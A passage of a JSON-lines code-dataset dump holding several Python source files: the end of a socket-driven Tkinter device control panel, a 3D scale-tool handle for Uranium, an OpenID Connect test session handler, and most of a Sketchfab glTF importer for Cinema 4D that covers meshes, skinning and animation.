args=(l2,)).start()\n threading.Thread(target=self.th3, args=(l3,)).start()\n\n def click(self, number):\n \"przyciski\"\n self.f4(number)\n\n async def led_loop(self):\n while True:\n try:\n self.f2()\n await asyncio.sleep(0.2)\n except Exception as e:\n pass\n\n async def rgb_loop(self):\n while True:\n try:\n self.f6()\n await asyncio.sleep(1)\n except Exception as e:\n pass\n\n async def text_loop(self):\n while True:\n try:\n self.f3()\n await asyncio.sleep(1.5)\n except Exception as e:\n pass\n\n def f1(self, what):\n \"ustawianie audio , what(-/=)\"\n\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(f\"1{what}\", \"utf-8\"))\n r = self.__connection.recv(64)\n BLOCK = True\n\n def f2(self):\n global BLOCK\n vol = 0\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"2\", \"utf-8\"))\n r = self.__connection.recv(64)\n r.decode(\"utf-8\")\n vol = r[1:]\n temp = round(8 * int(vol) / 100)\n for led in range(temp):\n self.__led[led].config(bg=\"#00ff00\")\n for led in range(temp, len(self.__led)):\n self.__led[led].config(bg=\"#003200\")\n BLOCK = True\n\n def f3(self):\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"3\", \"utf-8\"))\n r = self.__connection.recv(64)\n r = r.decode(\"utf-8\")\n self.__text_var = r[1:]\n self.__lcd.config(text=self.__text_var)\n BLOCK = True\n\n def f4(self, number):\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"4{}\".format(number), \"utf-8\"))\n r = self.__connection.recv(64)\n BLOCK = True\n\n def f6(self):\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"6\", \"utf-8\"))\n color = self.__connection.recv(64)\n color = color.decode(\"utf-8\")\n self.__rgb.config(bg=color)\n BLOCK = True\n","sub_path":"evb.py","file_name":"evb.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"374638573","text":"# Copyright (c) 2015 Ultimaker B.V.\n# Uranium is released under the terms of the AGPLv3 or higher.\n\nfrom UM.Scene.ToolHandle import ToolHandle\nfrom UM.Mesh.MeshData import MeshData\nfrom UM.Mesh.MeshBuilder import MeshBuilder\nfrom UM.Math.Vector import Vector\n\nclass ScaleToolHandle(ToolHandle):\n def __init__(self, parent = None):\n super().__init__(parent)\n\n self._lineWidth = 0.5\n self._lineLength= 40\n self._handlePosition = 40\n self._handleWidth = 4\n\n self._activeLineWidth = 0.8\n self._activeLineLength = 40\n self._activeHandlePosition = 40\n self._activeHandleWidth = 15\n\n #SOLIDMESH -> LINES\n mb = MeshBuilder()\n\n mb.addCube(\n width = self._lineWidth,\n height = self._lineLength,\n depth = self._lineWidth,\n center = Vector(0, self._handlePosition/2, 0),\n color = ToolHandle.YAxisColor\n )\n mb.addCube(\n width = self._lineLength,\n height = self._lineWidth,\n depth = self._lineWidth,\n center = Vector(self._handlePosition/2, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._lineWidth,\n height = self._lineWidth,\n depth = self._lineLength,\n center = Vector(0, 0, self._handlePosition/2),\n color = ToolHandle.ZAxisColor\n )\n\n #SOLIDMESH -> HANDLES\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(0, 0, 0),\n color = ToolHandle.AllAxisColor\n )\n\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(0, self._handlePosition, 0),\n color = ToolHandle.YAxisColor\n )\n\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(self._handlePosition, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(0, 0, self._handlePosition),\n color = ToolHandle.ZAxisColor\n )\n self.setSolidMesh(mb.getData())\n\n #SELECTIONMESH -> LINES\n mb = MeshBuilder()\n mb.addCube(\n width = self._activeLineWidth,\n height = self._activeLineLength,\n depth = self._activeLineWidth,\n center = Vector(0, self._activeHandlePosition/2, 0),\n color = ToolHandle.YAxisColor\n )\n\n mb.addCube(\n width = self._activeLineLength,\n height = self._activeLineWidth,\n depth = self._activeLineWidth,\n center = Vector(self._activeHandlePosition/2, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._activeLineWidth,\n height = self._activeLineWidth,\n depth = self._activeLineLength,\n center = Vector(0, 0, self._activeHandlePosition/2),\n color = ToolHandle.ZAxisColor\n )\n\n #SELECTIONMESH -> HANDLES\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(0, 0, 0),\n color = ToolHandle.AllAxisColor\n )\n\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(0, self._activeHandlePosition, 0),\n color = ToolHandle.YAxisColor\n )\n\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(self._activeHandlePosition, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(0, 0, self._activeHandlePosition),\n color = ToolHandle.ZAxisColor\n )\n\n self.setSelectionMesh(mb.getData())\n","sub_path":"plugins/Tools/ScaleTool/ScaleToolHandle.py","file_name":"ScaleToolHandle.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227286004","text":"import copy\nimport logging\n\nfrom otest import Done\nfrom otest import session\n\nfrom oidctest.prof_util import map_prof\n\n__author__ = 'roland'\n\nlogger = logging.getLogger(__name__)\n\n\nclass Node(object):\n def __init__(self, name, desc, mti=None):\n self.name = name\n self.desc = desc\n self.mti = mti\n self.state = 0\n self.info = \"\"\n self.rmc = False\n self.experr = False\n self.complete = False\n\n\nclass SessionHandler(session.SessionHandler):\n def session_setup(self, path=\"\", index=0):\n logger.info(\"session_setup\")\n\n _keys = list(self.keys())\n for key in _keys:\n if key.startswith(\"_\"):\n continue\n elif key in [\"tests\", \"flow_names\", \"response_type\",\n \"test_info\", \"profile\"]: # don't touch !\n continue\n else:\n del self[key]\n\n self[\"testid\"] = path\n for node in self[\"tests\"]:\n if node.name == path:\n self[\"node\"] = node\n break\n\n if \"node\" not in self:\n raise Exception(\"Unknown node name: {}\".format(path))\n\n self[\"flow\"] = self.test_flows[path]\n self[\"sequence\"] = copy.deepcopy(self[\"flow\"][\"sequence\"])\n self[\"sequence\"].append(Done)\n self[\"index\"] = index\n self.session = session\n\n def init_session(self, profile=None):\n if not profile:\n profile = self.profile\n\n f_names = list(self.test_flows.keys())\n f_names.sort()\n self[\"flow_names\"] = []\n for k in self.order:\n k += '-'\n l = [z for z in f_names if z.startswith(k)]\n self[\"flow_names\"].extend(l)\n\n _tests = []\n for k in self[\"flow_names\"]:\n _test = self.test_flows[k]\n if map_prof(profile, _test[\"profile\"]):\n try:\n kwargs = {\"mti\": _test[\"mti\"]}\n except KeyError:\n kwargs = {}\n _tests.append(Node(k, _test[\"desc\"], **kwargs))\n\n self[\"tests\"] = _tests\n self[\"test_info\"] = {}\n self[\"profile\"] = profile\n self.session = session\n return session\n","sub_path":"src/oidctest/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357299617","text":"# Copyright(c) 2017-2019 Sketchfab Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# TODO:\n# - Add Morphing support (cf \"scifi girl\")\n# - Fix skinning for some bones extremities (hair on \"ruby rose\", leg on \"arachnea\")\n\nimport os\nimport math\nimport sys\nimport c4d\nimport shutil\n\nfrom c4d import plugins, gui\nfrom c4d.modules.character import CAWeightTag\n\nfrom gltfio.imp.gltf2_io_gltf import glTFImporter\nfrom gltfio.imp.gltf2_io_binary import BinaryData\nfrom sketchfab.utils import Utils\n\n\nclass TextureWrapper:\n def __init__(self, filepath, sampler):\n self.filepath = filepath\n self.sampler = sampler\n\n def to_c4d_shader(self, alpha_only=False):\n sha = c4d.BaseList2D(c4d.Xbitmap)\n sha[c4d.BITMAPSHADER_FILENAME] = self.filepath\n\n if alpha_only:\n ls = c4d.LayerSet()\n ls.SetMode(c4d.LAYERSETMODE_LAYERALPHA)\n sha[c4d.BITMAPSHADER_LAYERSET] = ls\n\n # Barely support texture filtering\n if self.sampler.min_filter in (9728, 9984) or self.sampler.mag_filter in (9728, 9984):\n sha[c4d.BITMAPSHADER_INTERPOLATION] = c4d.BITMAPSHADER_INTERPOLATION_NONE\n\n return sha\n\n\nclass Skin:\n\n def __init__(self, gltf, skin_idx, mesh_idx, node_idx):\n\n # Get the data\n self.gltf_skin = gltf.data.skins[skin_idx]\n self.node_idx = [node_idx]\n self.mesh_idx = [mesh_idx]\n self.skin_idx = skin_idx\n self.name = self.gltf_skin.name\n self.root = self.gltf_skin.skeleton\n self.joints = self.gltf_skin.joints\n self.ibm_idx = self.gltf_skin.inverse_bind_matrices\n self.IBMs = BinaryData.get_data_from_accessor(gltf, self.ibm_idx)\n\n\nclass ImportGLTF(plugins.ObjectData):\n\n #############################\n # BASE FUNCTIONS\n #############################\n\n def __init__(self, progress_callback=None):\n self.progress_callback = progress_callback\n self.model_dir = ''\n self.gltf_textures = []\n self.gltf_materials = []\n self.is_done = False\n self.has_vertex_colors = False\n self.has_problematic_polygons = False\n self.has_morphing = False\n\n def run(self, filepath, uid=None):\n\n print(\"\\nImporting %s\\n\" % filepath)\n\n self.model_dir = os.path.split(filepath)[0]\n self.is_done = False\n gltf = glTFImporter(filepath)\n success, txt = gltf.read()\n\n # Discard point clouds\n if not self.has_polygons(gltf):\n msg = \"No polygons detected in the model.\\nPoints cloud cannot be imported into Cinema 4D.\\nAborting.\"\n gui.MessageDialog(text=msg, type=c4d.GEMB_OK)\n self.is_done = True\n self.progress_callback('Done', 1, 1)\n return \n\n # Import\n self.import_gltf_textures(gltf)\n imported_materials = self.import_gltf_materials(gltf)\n skins = self.parse_gltf_skins(gltf)\n nodes = self.create_c4d_nodes(gltf, skins, imported_materials)\n self.create_c4d_hierarchy(gltf, nodes, skins)\n self.create_c4d_weights(gltf, nodes, skins)\n self.import_animations(gltf, nodes)\n self.finish_import(gltf, nodes)\n\n def finish_import(self, gltf, nodes):\n gltf_meta = gltf.data.asset\n if gltf_meta.extras:\n title = gltf_meta.extras.get('title', 'Imported')\n author = gltf_meta.extras.get('author')\n license = gltf_meta.extras.get('license')\n note = ''\n\n # Rename root node with model title, and add a node without transforms\n roots = [nodes[n] for n in nodes if nodes[n].GetUp() is None]\n\n root_node = c4d.BaseObject(c4d.Onull)\n root_node.SetName(title)\n c4d.documents.GetActiveDocument().InsertObject(root_node)\n for obj in roots:\n obj.InsertUnder(root_node)\n c4d.documents.GetActiveDocument().SetChanged()\n\n #Import message\n if self.has_morphing:\n note = note + ' - The model seems to contain morphing animations, which are not supported yet.'\n if self.has_vertex_colors:\n note = note + \" - Vertex colors have been imported but disabled to avoid unexpected results\"\n note = note + \"\\nYou can enable them manually in their material Color and Reflection layers named 'Vertex Colors'\"\n if self.has_problematic_polygons:\n note = note + \" - Some problematic polygons were encountered in the glTF model.\"\n node = note + \"\\nIf the imported model does not display as expected,\\nyou can try to download the source file of the model from Sketchfab\"\n if note:\n note = '\\n\\nWarnings: \\n' + note\n message = 'Successfuly imported model \"{}\"'.format(title)\n if author and license:\n message = message + u' by \"{}\" under the license \"{}\"'.format(Utils.remove_url(author), Utils.remove_url(license))\n message = message + note\n gui.MessageDialog(text=message, type=c4d.GEMB_OK)\n\n self.progress_callback('Done', 1, 1)\n c4d.DrawViews()\n self.is_done = True\n c4d.EventAdd()\n\n def AbortImport(self):\n pass\n\n #############################\n # HELPERS\n #############################\n\n def list_to_vec3(self, li):\n return c4d.Vector(li[0], li[1], li[2])\n\n def switch_handedness_v3(self, v3):\n v3[2] = -v3[2]\n return v3\n\n def quat_to_eulerxyz(self, quat):\n \n x, y, z, w = quat\n\n X = math.atan2(2*(w*x+y*z), 1-2*(x*x+y*y))\n tmp = 2*(w*y-x*z)\n Y = math.asin( 1 if tmp > 1 else -1 if tmp<-1 else tmp)\n Z = math.atan2(2*(x*y+w*z), 1-2*(y*y+z*z))\n\n # Handle singularities (half a degree threshold)\n if ((Y-math.pi/2)**2)**0.5 < math.pi/360:\n sign = math.copysign(1,Y)\n X = sign * 2 * math.atan2(x,w)\n Y = sign * math.pi/2\n Z =0\n\n return c4d.Vector(X, Y, Z)\n\n def gltf_matrix_to_c4d(self, M):\n\n v1 = c4d.Vector(M[0], M[1], M[2])\n v2 = c4d.Vector(M[4], M[5], M[6])\n v3 = c4d.Vector(M[8], M[9], M[10])\n off = c4d.Vector(M[12], M[13], M[14])\n\n # RHS to LHS\n v1.z *= -1\n v2.z *= -1\n v3.x *= -1\n v3.y *= -1\n off.z *= -1\n\n return c4d.Matrix(off, v1, v2, v3)\n\n def has_polygons(self, gltf):\n # Try to find a geometry\n for node_idx in range(len(gltf.data.nodes)):\n gltf_node = gltf.data.nodes[node_idx]\n if gltf_node.mesh is not None:\n gltf_mesh = gltf.data.meshes[gltf_node.mesh]\n for prim in gltf_mesh.primitives:\n if prim.indices is not None:\n return True\n return False\n\n #############################\n # GLTF PARSING / C4D OBJECTS\n #############################\n\n def create_c4d_nodes(self, gltf, skins, materials):\n nodes = {} # Used to store C4D objects in parallel with GlTF nodes\n joints = list(set([j for jts in [skins[i].joints for i in skins] for j in jts]))\n\n for i in range(len(gltf.data.nodes)):\n\n gltf_node = gltf.data.nodes[i]\n c4d_object, name = None, None\n \n if i not in joints:\n if gltf_node.mesh is not None:\n c4d_object = self.convert_mesh(gltf, gltf_node.mesh, materials)\n name = gltf.data.meshes[gltf_node.mesh].name if gltf.data.meshes[gltf_node.mesh].name is not None else \"Mesh_%d\" % i\n else:\n c4d_object = c4d.BaseObject(c4d.Onull)\n name = gltf_node.name if gltf_node.name else \"GLTFObject\"\n else:\n c4d_object = c4d.BaseObject(c4d.Ojoint)\n name = gltf_node.name if gltf_node.name else \"GLTFJoint\"\n\n # Name\n nodes[i] = c4d_object\n c4d_object.SetName(name)\n\n # Transforms \n c4d_object.SetRotationOrder(5) # Local XYZ\n c4d_object.SetQuaternionRotationMode(1, 0)\n ignoreTransforms = gltf_node.mesh is not None and gltf_node.skin is not None\n if True:#not ignoreTransforms:\n self.apply_transforms(c4d_object, gltf_node)\n\n # LOG\n \"\"\"\n trans = \"\"\n if gltf_node.matrix is not None:\n trans = \"MAT: \" + str(gltf_node.matrix)\n else:\n if gltf_node.translation:\n trans += \"T: %s, \" % str(gltf_node.translation)\n if gltf_node.rotation:\n trans += \"R: %s, \" % str(gltf_node.rotation)\n if gltf_node.scale:\n trans += \"S: %s, \" % str(gltf_node.scale)\n\n print(\n str(i).zfill(3) + \", \"\n + ((\"Mesh\" if gltf_node.mesh else \"Null\") if i not in joints else \"Bone\") + \", \"\n + (\"MAT\" if gltf_node.matrix else \"TRS\")\n + \": %s, \" % name\n + (\" (ignored)\" if ignoreTransforms else \"\")\n + trans\n )\n \"\"\"\n\n self.progress_callback(\"Importing nodes\", i + 1, len(gltf.data.nodes))\n\n return nodes\n\n def apply_transforms(self, obj, gltf_node):\n\n if gltf_node is not None:\n\n if gltf_node.matrix:\n\n c4d_mat = self.gltf_matrix_to_c4d(gltf_node.matrix)\n obj.SetMg(c4d_mat)\n\n else:\n\n if gltf_node.rotation:\n R = self.quat_to_eulerxyz(gltf_node.rotation)\n obj.SetRelRot((R[0], R[1], -R[2]))\n if gltf_node.scale:\n scale = gltf_node.scale\n obj.SetRelScale(c4d.Vector(scale[0], scale[1], scale[2]))\n if gltf_node.translation:\n tr = gltf_node.translation\n obj.SetRelPos(c4d.Vector(tr[0], tr[1], -tr[2]))\n \n def convert_primitive(self, prim, gltf, materials):\n # Helper functions\n def float2bytes(f):\n int_value = int(math.fabs(f * 32000.0))\n high_byte = int(int_value / 256)\n low_byte = int_value - 256 * high_byte\n\n if f < 0:\n high_byte = 255 - high_byte\n low_byte = 255 - low_byte\n\n return (low_byte, high_byte)\n\n # Normals tag. (Contains 12 WORDs per polygon, enumerated like the following: ax,ay,az,bx,by,bz,cx,cy,cz,dx,dy,dz.\n # The value is the Real value of the normal vector component multiplied by 32000.0.)\n def set_normals(normal_tag, polygon, normal_a, normal_b, normal_c, normal_d):\n normal_list = [normal_a, normal_b, normal_c, normal_d]\n normal_buffer = normal_tag.GetLowlevelDataAddressW()\n vector_size = 6\n component_size = 2\n\n for v in range(4):\n normal = normal_list[v]\n component = [normal.x, normal.y, normal.z]\n\n for c in range(3):\n low_byte, high_byte = float2bytes(component[c])\n\n normal_buffer[normal_tag.GetDataSize() * polygon + v * vector_size + c * component_size + 0] = chr(low_byte)\n normal_buffer[normal_tag.GetDataSize() * polygon + v * vector_size + c * component_size + 1] = chr(high_byte)\n\n def parse_normals():\n normal = []\n if 'NORMAL' in prim.attributes:\n normal = BinaryData.get_data_from_accessor(gltf, prim.attributes['NORMAL'])\n\n if normal:\n normaltag = c4d.NormalTag(nb_poly)\n for polyidx in range(nb_poly):\n poly = c4d_mesh.GetPolygon(polyidx)\n normal_a = self.switch_handedness_v3(self.list_to_vec3(normal[poly.a]))\n normal_b = self.switch_handedness_v3(self.list_to_vec3(normal[poly.b]))\n normal_c = self.switch_handedness_v3(self.list_to_vec3(normal[poly.c]))\n normal_d = c4d.Vector(0.0, 0.0, 0.0)\n\n set_normals(normaltag, polyidx, normal_a, normal_b, normal_c, normal_d)\n\n c4d_mesh.InsertTag(normaltag)\n\n # A Phong tag is needed to make C4D use the Normal Tag (seems to be done for Collada)\n phong = c4d.BaseTag(5612)\n c4d_mesh.InsertTag(phong)\n\n def parse_texcoords(index, c4d_mesh):\n texcoord_key = 'TEXCOORD_{}'.format(index)\n if texcoord_key in prim.attributes:\n uvs = BinaryData.get_data_from_accessor(gltf, prim.attributes[texcoord_key])\n\n if uvs:\n uvtag = c4d.UVWTag(nb_poly)\n uvtag.SetName(texcoord_key)\n for i in range(0, nb_poly):\n poly = c4d_mesh.GetPolygon(i)\n aa = (uvs[poly.a][0], uvs[poly.a][1], 0.0)\n bb = (uvs[poly.b][0], uvs[poly.b][1], 0.0)\n cc = (uvs[poly.c][0], uvs[poly.c][1], 0.0)\n uvtag.SetSlow(i, aa, bb, cc, (0.0, 0.0, 0.0))\n\n c4d_mesh.InsertTag(uvtag)\n\n def parse_vertex_colors(index, c4d_mesh):\n colors = []\n color_key = 'COLOR_{}'.format(index)\n colortag = None\n if color_key in prim.attributes:\n colors = BinaryData.get_data_from_accessor(gltf, prim.attributes[color_key])\n if colors:\n nb_verts = len(verts)\n colortag = c4d.VertexColorTag(nb_verts)\n colortag.SetPerPointMode(True)\n colortag.SetName(color_key)\n vtx_color_data = colortag.GetDataAddressW()\n\n has_alpha = len(colors[0]) > 3\n for i in range(nb_verts):\n c4d.VertexColorTag.SetPoint(vtx_color_data, None, None, i, c4d.Vector4d(colors[i][0], colors[i][1], colors[i][2], colors[i][3] if has_alpha else 1.0))\n\n c4d_mesh.InsertTag(colortag)\n\n self.has_vertex_colors = True\n\n return colortag\n\n def parse_tangents():\n tangent = []\n if 'TANGENT' in prim.attributes:\n tangent = BinaryData.get_data_from_accessor(gltf, prim.attributes['TANGENT'])\n if tangent:\n tangentTag = c4d.TangentTag(nb_poly)\n for polyidx in range(0, nb_poly):\n poly = c4d_mesh.GetPolygon(polyidx)\n normal_a = self.switch_handedness_v3(self.list_to_vec3(tangent[poly.a]))\n normal_b = self.switch_handedness_v3(self.list_to_vec3(tangent[poly.b]))\n normal_c = self.switch_handedness_v3(self.list_to_vec3(tangent[poly.c]))\n normal_d = c4d.Vector(0.0, 0.0, 0.0)\n\n set_normals(tangentTag, polyidx, normal_a, normal_b, normal_c, normal_d)\n\n c4d_mesh.InsertTag(tangentTag)\n\n vertex = BinaryData.get_data_from_accessor(gltf, prim.attributes['POSITION'])\n nb_vertices = len(vertex)\n\n # Vertices are stored under the form # [(1.0, 0.0, 0.0), (0.0, 0.0, 0.0) ...]\n verts = []\n for i in range(len(vertex)):\n vect = c4d.Vector(vertex[i][0], vertex[i][1], vertex[i][2])\n verts.append(self.switch_handedness_v3(vect))\n\n indices = BinaryData.get_data_from_accessor(gltf, prim.indices)\n nb_poly = len(indices) / 3\n\n c4d_mesh = c4d.PolygonObject(nb_vertices, nb_poly)\n c4d_mesh.SetAllPoints(verts)\n\n # Indices are stored like [(0,), (1,), (2,)]\n current_poly = 0\n try:\n for i in range(0, len(indices), 3):\n poly = c4d.CPolygon(indices[i + 2][0], indices[i + 1][0], indices[i][0]) # indice list is like [(0,), (1,), (2,)]\n c4d_mesh.SetPolygon(current_poly, poly)\n current_poly += 1\n except:\n self.has_problematic_polygons = True\n return None # Avoid crash from Sketchup because of wrong geometry\n\n parse_normals()\n\n # TANGENTS (Commented for now, \"Tag not in sync\" error popup in c4d)\n # parse_tangents()\n\n for texcoord_index in range(10):\n parse_texcoords(texcoord_index, c4d_mesh)\n\n if prim.material is not None:\n \n mat = materials[prim.material]\n\n # Only parse COLORS_0\n colortag = parse_vertex_colors(0, c4d_mesh)\n\n # Enable vertex colors\n self.make_vertex_colors_layer(mat, colortag)\n\n if not gltf.data.materials[prim.material].double_sided:\n mat.SetParameter(c4d.TEXTURETAG_SIDE, c4d.SIDE_FRONT, c4d.DESCFLAGS_SET_NONE)\n\n mattag = c4d.TextureTag()\n mattag.SetParameter(c4d.TEXTURETAG_MATERIAL, mat, c4d.DESCFLAGS_SET_NONE)\n mattag.SetParameter(c4d.TEXTURETAG_PROJECTION, c4d.TEXTURETAG_PROJECTION_UVW, c4d.DESCFLAGS_GET_NONE)\n c4d_mesh.InsertTag(mattag)\n\n c4d_mesh.SetDirty(c4d.DIRTYFLAGS_ALL)\n\n return c4d_mesh\n\n def convert_mesh(self, gltf, mesh_index, materials):\n gltf_mesh = gltf.data.meshes[mesh_index]\n\n if len(gltf_mesh.primitives) == 1:\n return self.convert_primitive(gltf_mesh.primitives[0], gltf, materials)\n else:\n c4d_object = c4d.BaseObject(c4d.Onull)\n for prim in gltf_mesh.primitives:\n c4d_mesh = self.convert_primitive(prim, gltf, materials)\n c4d_mesh.InsertUnder(c4d_object)\n return c4d_object\n\n def create_c4d_hierarchy(self, gltf, nodes, skins):\n\n # Ignore transforms for skinned meshes\n mesh_nodes_idx = [n for n in range(len(gltf.data.nodes)) if gltf.data.nodes[n].mesh is not None and gltf.data.nodes[n].skin is not None]\n\n # Add GlTF root objects to document\n for node in gltf.data.scenes[0].nodes:\n c4d.documents.GetActiveDocument().InsertObject(nodes[node])\n \n # Do the parenting\n for n in nodes:\n if nodes[n] is not None:\n # Insert the children under their respective parents\n if gltf.data.nodes[int(n)].children:\n for child in gltf.data.nodes[int(n)].children:\n if nodes[child] is not None:\n if child not in mesh_nodes_idx:\n c4d.documents.GetActiveDocument().InsertObject(nodes[child], parent=nodes[n])\n else:\n # If skinned, assign to the root\n c4d.documents.GetActiveDocument().InsertObject(nodes[child])\n\n # Apply changes\n c4d.documents.GetActiveDocument().SetChanged()\n\n #############################\n # SKINNING AND ANIMATIONS\n #############################\n\n def parse_gltf_skins(self, gltf):\n skins = {}\n for nodeidx in range(len(gltf.data.nodes)):\n gltf_node = gltf.data.nodes[nodeidx]\n if hasattr(gltf_node, \"skin\") and gltf_node.skin is not None:\n if gltf_node.skin not in skins:\n skin = Skin(gltf, gltf_node.skin, gltf_node.mesh, nodeidx)\n skins[gltf_node.skin] = skin\n else:\n skins[gltf_node.skin].mesh_idx.append(gltf_node.mesh)\n skins[gltf_node.skin].node_idx.append(nodeidx)\n return skins\n\n def create_c4d_weights(self, gltf, nodes, skins):\n\n initial_transforms = {}\n\n # create the weights and bind them to joints\n for i in skins:\n\n skin = skins[i]\n \n for iNode, iMesh in zip(skin.node_idx, skin.mesh_idx):\n\n c4d_obj = nodes[iNode]\n gltf_mesh = gltf.data.meshes[iMesh]\n\n # Create the skin object\n c4d_skin = c4d.BaseObject(c4d.Oskin)\n c4d.documents.GetActiveDocument().InsertObject(c4d_skin, parent=c4d_obj)\n\n # Read in the data\n for prim in gltf_mesh.primitives:\n\n # Create the C4D tag\n tag = CAWeightTag()\n c4d_obj.InsertTag(tag) \n\n # Accessor data\n weights = BinaryData.get_data_from_accessor(gltf, prim.attributes[\"WEIGHTS_0\"]) if \"WEIGHTS_0\" in prim.attributes else []\n joints = BinaryData.get_data_from_accessor(gltf, prim.attributes[\"JOINTS_0\"]) if \"JOINTS_0\" in prim.attributes else []\n \n # Unique list of joints used for the skinning\n local_joints = list(set([j for sub in joints for j in sub]))\n\n # Add the joints\n c4d_joints = []\n c4d_ibms = []\n gltf_to_c4d = {}\n for idx in local_joints:\n\n ibm = skin.IBMs[idx]\n ind = skin.joints[idx]\n joint = nodes[ind]\n gltf_to_c4d[ind] = tag.AddJoint(joint)\n \n c4d_ibms.append(ibm)\n c4d_joints.append(joint)\n\n # Set weights according to the version\n for vert_idx in range(len(weights)):\n for influence_idx in range(len(weights[0])):\n weight = weights[vert_idx][influence_idx]\n if weight > 0:\n tag.SetWeight(\n gltf_to_c4d[ skin.joints[joints[vert_idx][influence_idx] ]], \n vert_idx, \n weight\n )\n\n # Add the IBM\n for joint, M in zip(c4d_joints, c4d_ibms):\n\n if joint.GetName() not in initial_transforms:\n initial_transforms[joint.GetName()] = joint.GetMl()\n \n # Read the IBM\n if M is not None:\n c4d_mat = self.gltf_matrix_to_c4d(M)\n joint.SetMg(c4d_mat.__invert__())\n\n # Bind in C4D\n doc = c4d.documents.GetActiveDocument()\n doc.SetActiveTag(tag, mode=c4d.SELECTION_NEW)\n c4d.CallButton(tag, c4d.ID_CA_WEIGHT_TAG_SET)\n \n # Restore the inital position\n for jt in skin.joints:\n joint = nodes[jt]\n name = joint.GetName()\n if name in initial_transforms:\n joint.SetMl(initial_transforms[name])\n\n def import_animations(self, gltf, nodes):\n\n if gltf.data.animations is None:\n return\n\n nAnimations = len(gltf.data.animations)\n\n CHANNELS = {}\n\n # Values which... just work\n eps = 1.e-3 # Minimal time between distinct frames\n margin = 1.e-2 # Offset between animations\n\n # Read the animation data into CHANNELS\n for anim_idx, animation in enumerate(gltf.data.animations):\n for channel in animation.channels:\n\n # Parse the glTF data\n node_idx = channel.target.node\n path = channel.target.path\n ID = \"%d_%s\" % (node_idx, path)\n\n # Create the channel\n if ID not in CHANNELS:\n CHANNELS[ID] = {}\n CHANNELS[ID][\"time\"] = [[] for i in range(nAnimations)]\n CHANNELS[ID][\"data\"] = [[] for i in range(nAnimations)]\n CHANNELS[ID][\"fixed\"] = [0 for i in range(nAnimations)]\n CHANNELS[ID][\"path\"] = path\n CHANNELS[ID][\"node\"] = node_idx\n else:\n if len(CHANNELS[ID][\"time\"][anim_idx]):\n print(\"Skipped a duplicate animation channel\")\n continue\n\n # Read the buffers\n sampler = animation.samplers[channel.sampler]\n in_data = BinaryData.get_data_from_accessor(gltf, sampler.input)\n in_data = [t[0] for t in in_data]\n out_data = BinaryData.get_data_from_accessor(gltf, sampler.output)\n\n # Sort the keyframes\n in_data, out_data = (list(t) for t in zip(*sorted(zip(in_data, out_data))))\n\n # Remove duplicates\n oldt = -1e8\n cpt = 0\n idx_to_remove = []\n for i,o in zip(in_data, out_data):\n if i-oldt < eps:\n idx_to_remove.append(cpt)\n cpt+=1\n oldt = i\n for idx in idx_to_remove[::-1]:\n in_data.pop(idx)\n out_data.pop(idx)\n\n CHANNELS[ID][\"time\"][anim_idx] = in_data\n CHANNELS[ID][\"data\"][anim_idx] = out_data\n\n\n # Offset the animations to make them sequential\n ranges = [{\"start\": 1e8, \"end\":-1e8} for a in gltf.data.animations]\n animationStart = 0\n for i in range(nAnimations):\n # Compute the animation range\n for ID in CHANNELS:\n if len(CHANNELS[ID][\"time\"][i]): # Isactiveforthisanim\n ranges[i][\"start\"] = min(CHANNELS[ID][\"time\"][i][0], ranges[i][\"start\"])\n ranges[i][\"end\"] = max(CHANNELS[ID][\"time\"][i][-1], ranges[i][\"end\"])\n # Offset the time values\n for ID in CHANNELS:\n if len(CHANNELS[ID][\"time\"][i]):\n CHANNELS[ID][\"time\"][i] = [t + animationStart - ranges[i][\"start\"] for t in CHANNELS[ID][\"time\"][i]]\n # Update the starting point of the next animation and the newranges\n ranges[i][\"start\"] += animationStart\n ranges[i][\"end\"] += animationStart\n animationStart += margin + ranges[i][\"end\"] - ranges[i][\"start\"]\n \n # Remember the static positions of the nodes concerned by the keyframed channels\n for ID in CHANNELS:\n node_idx = CHANNELS[ID][\"node\"]\n path = CHANNELS[ID][\"path\"]\n \n c4d_object = nodes[node_idx]\n CHANNELS[ID][\"rest_data\"] = None\n if path == \"translation\":\n CHANNELS[ID][\"rest_data\"] = c4d_object.GetRelPos()\n elif path == \"scale\":\n CHANNELS[ID][\"rest_data\"] = c4d_object.GetRelScale()\n elif path == \"rotation\":\n 